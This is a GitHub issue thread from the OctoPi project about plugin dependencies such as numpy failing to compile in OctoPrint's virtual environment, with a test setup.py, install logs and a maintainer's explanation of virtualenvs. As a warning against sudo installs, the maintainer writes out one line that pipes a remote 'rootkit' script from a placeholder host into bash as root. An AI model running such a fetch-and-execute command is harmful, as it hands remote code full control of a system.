guysoft/OctoPi #244: two python on system, octoprint-pythin is missing -dev

MarcusWolschon, 2016-07-08:
Octoprint in the OctoPi image uses it's own
/home/pi/oprint/local/bin/python
   * It ignores python modules installed system-wide via the package system.
   * It does not include python-dev to add packages that are required by Octoprint plugins via the "plugin_requires" statement in their setup.py

Example:
A plugin with
   plugin_requires = ["RPi.GPIO>=0.6", "numpy==1.8.2"]
then run
   sudo /home/pi/oprint/local/bin/python  setup.py install 
numpy can't be compiled after download because basics such as python.h are missing
   _configtest.c:1:20: fatal error: Python.h: No such file or directory
 #include <Python.h>
                    ^
   compilation terminated.
   ...
   SystemError: Cannot compile 'Python.h'. Perhaps you need to install python-dev|python-devel.

of cause python-dev IS installed system-wide.

foosel, 2016-07-08:
> Octoprint in the OctoPi image uses it's own /home/pi/oprint/local/bin/python

No, it uses its own `/home/pi/oprint/bin/python`. Not sure where you are taking the `local` from.

> sudo

Yikes! NEVER install ANYTHING in the virtual env with sudo. You do not need sudo. If you need sudo, something is broken (possibly due to an earlier misuse of sudo). Using sudo for package installation is a security incident bound to happen.

> numpy can't be compiled after download because basics such as python.h are missing

Sorry, but can't confirm:

```
pi@octopi:~ $ ~/oprint/bin/pip install numpy
Collecting numpy
  Downloading numpy-1.11.1.zip (4.7MB)
    100% |████████████████████████████████| 4.7MB 35kB/s
Installing collected packages: numpy
  Running setup.py install for numpy ... done
Successfully installed numpy-1.11.1
```

Took ages to compile, but in the end it worked. Tested on an unmodified OctoPi 0.13.0.

MarcusWolschon, 2016-07-08:
Workaround for others, that can't get their Octopi plugins installed because dependencies listed in setup.py can't be handled:

/home/pi/oprint/bin/pip install numpy

foosel, 2016-07-08:
Could you please share which plugin you are running into issues with and how exactly you are attempting to install it? Again, compiling dependencies with OctoPrint's virtual environment on OctoPi works just fine under 0.13 (and earlier version too for that matter), without any work around being necessary. A manual pip install of numpy or any other dependency is the same as what installing a plugin's additional required packages does.

MarcusWolschon, 2016-07-08:
A new plugin.
It has a dependency on numpy listed in it's setup.py
setup.py install 
was supposed to take care of that dependency but complains that python-dev is missing with the error messages quoted above.

1) There already is a system wide python on the Raspian, so on a space restricted platform such as the Raspberry Pi OctoPi has no business in keeping a second Python around on the tiny SD card.
2) numpy was already installed via aptitude in the system-wide python since I developed a lot of test code on the command line outside of Octoprint first to verify the functionality of my sensors.
3) I did NOT manually install it via the pip of the python Octopi uses because doing that is the job of setup.py. That was just my workaround to get it working in the end but it is obviously not acceptable for any release of the plugin to regular users who only ever see the web interface and install plugins from there.

Could it be that my usage of sudo when running setup.py caused this? (I just didn't know any better. Installing software looked like something only root is allowed to do anyway.)

foosel, 2016-07-08:
I don't know what you did, all I can tell you is that dependencies stated in `plugin_requires` that need a compilation compile on a stock OctoPi 0.13.0. I setup a minimal plugin to test this. `RPIO` has a native component that needs compilation and [fails if python.h **can't** be found for whatever reason](https://github.com/metachris/RPIO/issues/54). This is the test plugin's `setup.py`:

``` python
# coding=utf-8

########################################################################################################################
### Do not forget to adjust the following variables to your own plugin.

# The plugin's identifier, has to be unique
plugin_identifier = "plugin_test"

# The plugin's python package, should be "octoprint_<plugin identifier>", has to be unique
plugin_package = "octoprint_plugin_test"

# The plugin's human readable name. Can be overwritten within OctoPrint's internal data via __plugin_name__ in the
# plugin module
plugin_name = "OctoPrint-PluginTest"

# The plugin's version. Can be overwritten within OctoPrint's internal data via __plugin_version__ in the plugin module
plugin_version = "0.1.0"

# The plugin's description. Can be overwritten within OctoPrint's internal data via __plugin_description__ in the plugin
# module
plugin_description = """Just a quick plugin test."""

# The plugin's author. Can be overwritten within OctoPrint's internal data via __plugin_author__ in the plugin module
plugin_author = "Gina Häußge"

# The plugin's author's mail address.
plugin_author_email = "osd@foosel.net"

# The plugin's homepage URL. Can be overwritten within OctoPrint's internal data via __plugin_url__ in the plugin module
plugin_url = ""

# The plugin's license. Can be overwritten within OctoPrint's internal data via __plugin_license__ in the plugin module
plugin_license = "AGPLv3"

# Any additional requirements besides OctoPrint should be listed here
plugin_requires = ["RPIO"]

### --------------------------------------------------------------------------------------------------------------------
### More advanced options that you usually shouldn't have to touch follow after this point
### --------------------------------------------------------------------------------------------------------------------

# Additional package data to install for this plugin. The subfolders "templates", "static" and "translations" will
# already be installed automatically if they exist.
plugin_additional_data = []

# Any additional python packages you need to install with your plugin that are not contains in <plugin_package>.*
plugin_addtional_packages = []

# Any python packages within <plugin_package>.* you do NOT want to install with your plugin
plugin_ignored_packages = []

# Additional parameters for the call to setuptools.setup. If your plugin wants to register additional entry points,
# define dependency links or other things like that, this is the place to go. Will be merged recursively with the
# default setup parameters as provided by octoprint_setuptools.create_plugin_setup_parameters using
# octoprint.util.dict_merge.
#
# Example:
#     plugin_requires = ["someDependency==dev"]
#     additional_setup_parameters = {"dependency_links": ["https://github.com/someUser/someRepo/archive/master.zip#egg=someDependency-dev"]}
additional_setup_parameters = {}

########################################################################################################################

from setuptools import setup

try:
        import octoprint_setuptools
[... 107 lines cut ...]
Running setup.py install for RPIO: finished with status 'done'
Running setup.py install for OctoPrint-PluginTest: started
Running setup.py install for OctoPrint-PluginTest: finished with status 'done'
Successfully installed OctoPrint-PluginTest-0.1.0 RPIO-0.10.0
You are using pip version 8.1.1, however version 8.1.2 is available.
You should consider upgrading via the 'pip install --upgrade pip' command.
Done!
Close
Plugin "OctoPrint-PluginTest" installed
The plugin was installed successfully
```

So, as you see, `python.h` gets found just fine (and the location of the used python site-packages folder and executable path - which is a virtual environment basically is - is irrelevant for development headers anyhow), compilation succeeds, installation of plugin accordingly as well.

Whatever it is that's not working for you, it's not something that's broken on stock 0.13.0.

> OctoPi has no business in keeping a second Python around on the tiny SD card

Virtual environments are a means to get specific dependency versions to exist concurrently on a system, plus it gets around needing root (and hence sudo) to update the software or installing plugins. Some of the software versions shipped with stock raspbian are broken (the requests package [for example](https://github.com/guysoft/OctoPi/issues/155#issuecomment-159695290)) and can't be updated due to other dependencies or being provided by native OS packages and no fixed versions being available there. Installing application software globally is also frowned upon due to needing root rights to do so (setup.py of dependencies might contain harmful code - `sudo curl http://example.com/funny_rootkit.sh | bash`) plus introducing dependency issues across other installed system packages. So please don't tell me something has no business when there are multiple reasons to do it exactly the way it is done. Also - limited system resources? It's hard to even get SD cards smaller than 8GB  [... cut ...]  them on 0.13 here. Also that would have been noticed way before since for example [the quite popular gpx plugin actually does have a native component](https://github.com/markwal/OctoPrint-GPX/blob/master/setup.py#L93), and that sees heavy use by the general population. If it was not possible to compile that through the regular plugin install process, pitchforks and torches would be at the ready.

Can you try with a fresh image? That would also rule out any issues introduced by the `sudo` abuse.

MarcusWolschon, 2016-07-08:
lets just close the issue.
I got a good explanation on why there are multiple python instances in the image and aparently the cause of the original issue is found.
I can not try a fresh image. Too much work in setting up all the development happening on it again. (wifi networks, git sources, unfinished source code, helper scripts)

foosel, 2016-07-09:
> I can not try a fresh image. Too much work in setting up all the development happening on it again. (wifi networks, git sources, unfinished source code, helper scripts)

That's why I have a couple of SD cards on hand (which is a good idea in any case, to allow for quick experiments and such things). You should also make a backup of your current card in any case if you did so much customization. A power interruption at the wrong time can make all the effort go to waste - I lost a heavily customized image this way last year thanks to a short power outage, with loads of IoT and home automation scripts. Still haven't fully recovered my steps, I wish I'd had a backup. Also the reason why I installed a poor man's USV (USB battery that acts as a pass through to the PSU). Just a friendly word of advice though.

> lets just close the issue.

Ok then.

closed 2016-07-09 by foosel